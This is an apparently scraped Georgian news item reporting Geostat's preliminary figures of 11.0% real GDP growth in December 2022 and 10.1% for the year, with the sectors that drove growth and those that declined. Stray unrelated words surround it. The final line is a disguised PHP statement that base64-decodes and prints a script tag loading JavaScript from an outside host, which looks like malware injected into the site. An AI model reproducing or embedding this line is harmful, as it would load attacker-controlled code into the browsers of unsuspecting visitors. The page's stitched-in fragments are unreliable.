celsiusi
ავერსი შნაიდერი
სტატისტიკის ეროვნული სამსახურის წინასწარი შეფასებით, 2022 წლის დეკემბერში, წინა წლის შესაბამის პერიოდთან შედარებით, რეალური მთლიანი შიდა პროდუქტის ზრდამ 11.0 პროცენტი შეადგინა, ხოლო 2022 წლის საშუალო რეალური ზრდა 10.1 პროცენტით განისაზღვრა.
საქსტატის ცნობით, 2022 წლის დეკემბერში, წინა წლის შესაბამის პერიოდთან შედარებით, ზრდის მიმართულებით მნიშვნელოვანი წვლილი შეიტანა ისეთმა დარგებმა, როგორიცაა მშენებლობა, დამამუშავებელი მრეწველობა, ტრანსპორტი და დასაწყობება, საფინანსო და სადაზღვევო საქმიანობები, ვაჭრობა, სასტუმროები და რესტორნები.
ხოლო კლების ტენდენცია დაფიქსირდა უძრავ ქონებასთან დაკავშირებული საქმიანობების, პროფესიული, სამეცნიერო და ტექნიკური საქმიანობების და ელექტროენერგიის, აირის, ორთქლისა და კონდიცირებული ჰაერის მიწოდების დარგებში.
449
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");